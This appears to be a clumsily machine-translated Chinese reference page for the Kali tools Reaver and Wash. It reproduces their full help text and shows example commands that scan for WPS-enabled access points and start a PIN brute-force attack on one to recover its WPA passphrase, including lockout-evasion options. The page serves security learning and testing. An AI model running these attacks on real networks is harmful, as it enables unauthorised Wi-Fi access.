掠夺者包装说明

掠夺者实现对WiFi保护设置(WPS)注册商的PIN暴力攻击,以恢复WPA / WPA2密码短语,如http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf描述。 掠夺者已被设计为针对WPS一健壮和实际的攻击,并且经测试对多种接入点和WPS实现。 平均而言,掠夺者会恢复目标AP的纯文本WPA / WPA2密钥在4-10小时,这取决于接入点。在实践中,一般会一半的时间来猜测正确的WPS PIN和恢复密码 资料来源:https://code.google.com/p/reaver-wps/

金甲虫首页 | 卡利掠夺者回购

  • 作者:战术网络解决方案,克雷格Heffner
  • 许可:GPL第二版

    0x01 包含在金甲虫包工具

    掠夺者 - WiFi保护设置攻击工具
    :~# reaver -h
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
    >
    Required Arguments:
      -i, --interface=<wlan>          Name of the monitor-mode interface to use
      -b, --bssid=<mac>               BSSID of the target AP
    Optional Arguments:
      -m, --mac=<mac>                 MAC of the host system
      -e, --essid=<ssid>              ESSID of the target AP
      -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
      -o, --out-file=<file>           Send output to a log file [stdout]
      -s, --session=<file>            Restore a previous session file
      -C, --exec=<command>            Execute the supplied command upon successful pin recovery
      -D, --daemonize                 Daemonize reaver
      -a, --auto                      Auto detect the best advanced options for the target AP
      -f, --fixed                     Disable channel hopping
      -5, --5ghz                      Use 5GHz 802.11 channels
      -v, --verbose                   Display non-critical warnings (-vv for more)
      -q, --quiet                     Only display critical messages
      -h, --help                      Show help
    Advanced Options:
      -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
      -d, --delay=<seconds>           Set the delay between pin attempts [1]
      -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
      -g, --max-attempts=<num>        Quit after num pin attempts
      -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
      -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
      -t, --timeout=<seconds>         Set the receive timeout period [5]
      -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
      -A, --no-associate              Do not associate with the AP (association must be done by another application)
      -N, --no-nacks                  Do not send NACK messages when out of order packets are received
      -S, --dh-small                  Use small DH keys to improve crack speed
      -L, --ignore-locks              Ignore locked state reported by the target AP
      -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
      -n, --nack                      Target AP always sends a NACK [Auto]
      -w, --win7                      Mimic a Windows 7 registrar [False]
    Example:
      reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
    

    0x02 洗 - WiFi保护设置扫描工具

    :~# wash -h
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
    >
    Required Arguments:
      -i, --interface=<iface>              Interface to capture packets on
      -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files
    Optional Arguments:
      -c, --channel=<num>                  Channel to listen on [auto]
      -o, --out-file=<file>                Write data to file
      -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
      -D, --daemonize                      Daemonize wash
      -C, --ignore-fcs                     Ignore frame checksum errors
      -5, --5ghz                           Use 5GHz 802.11 channels
      -s, --scan                           Use scan mode
      -u, --survey                         Use survey mode [default]
      -h, --help                           Show help
    Example:
      wash -i mon0
    

    0x03 洗用法示例

    扫描使用的监控模式接口 (-i MON0) 通道6 网(C6), 而忽略帧校验和 错误(-C):
:~# wash -i mon0 -c 6 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
>
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78       6            -73        1.0               No                ASUS

0x04 金甲虫用法示例

使用监控模式接口 (-i MON0) 攻击接入点 (-b E0:3F:49:6A:57:78), 显示详细输出 (-v):

:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
>
[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670

原文来自https://www.hackfun.org/kali-tools/reaver_zh.html。转载请注明原出处,商用请联系原作者授权。

results matching ""

    No results matching ""